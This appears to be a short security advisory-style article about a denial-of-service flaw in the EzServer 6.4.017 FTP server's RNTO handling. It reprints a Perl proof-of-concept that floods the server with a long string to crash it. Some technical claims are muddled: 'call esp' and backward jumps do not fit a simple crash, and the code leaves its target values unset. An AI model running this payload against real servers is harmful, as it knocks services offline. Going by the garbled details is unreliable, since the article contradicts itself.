A flaw in the EzServer 6.4.017 software has been discovered by cybersecurity researcher Fernando Mengali. The vulnerability, classified as a Denied of Service (DoS) issue, was reported on January 22, 2024. The exploit was tested on Windows XP Professional – Service Pack 2 and 3 – English, where it was found to effectively cause a denial of service on the affected server.
Mengali’s technique involved several strategies to increase the exploit’s reliability and performance. This included jumping to a static ‘call esp’, as well as implementing a backwards jump to code a known distance from the stack pointer. The flaw was found in the way the FTP server handled the amount of data or bytes sent to the command RNTO. Specifically, when authenticating to the FTP server with a large number of characters for the server to process, the server would crash as soon as it received and processed the input, resulting in a denial of service.
The successful exploitation of this vulnerability could allow remote attackers to crash the affected server, leading to a denial of service for legitimate users.
To demonstrate the exploit, Mengali shared a Proof of Concept (PoC) code snippet, which included the following code:
“`
$sis=”$^O”;
if ($sis eq “windows”){
$cmd=”cls”;
} else {
$cmd=”clear”;
}
system(“$cmd”);
print “[+] Exploiting… n”;
my $payload = “x41″x10698;
my $sock = IO::Socket::INET->new(PeerAddr => $ip, PeerPort => $port, Proto => ‘tcp’) or die “[-] Could not connect!n”;
$sock->send($payload);
$sock->close();
print “[+] Done – Exploited success!!!!!nn”;
“`
The PoC demonstrated how the vulnerability could be exploited to crash the FTP server, thereby denying service to legitimate users.
It is crucial for users and administrators of EzServer 6.4.017 to be aware of this security flaw and take appropriate measures to mitigate the risk of exploitation. As of now, there have been no reports of a fix or patch from the vendor, making it necessary for users to remain vigilant and implement safeguards to protect their systems from potential attacks.
Given the severity of the vulnerability, users should also consider reaching out to the vendor, if available, to request an update or workaround to address the issue. In the meantime, it is recommended to closely monitor network traffic and system logs for any signs of attempted exploitation. Furthermore, implementing strong firewall rules and intrusion detection systems can provide an additional layer of defense against potential attacks targeting this vulnerability.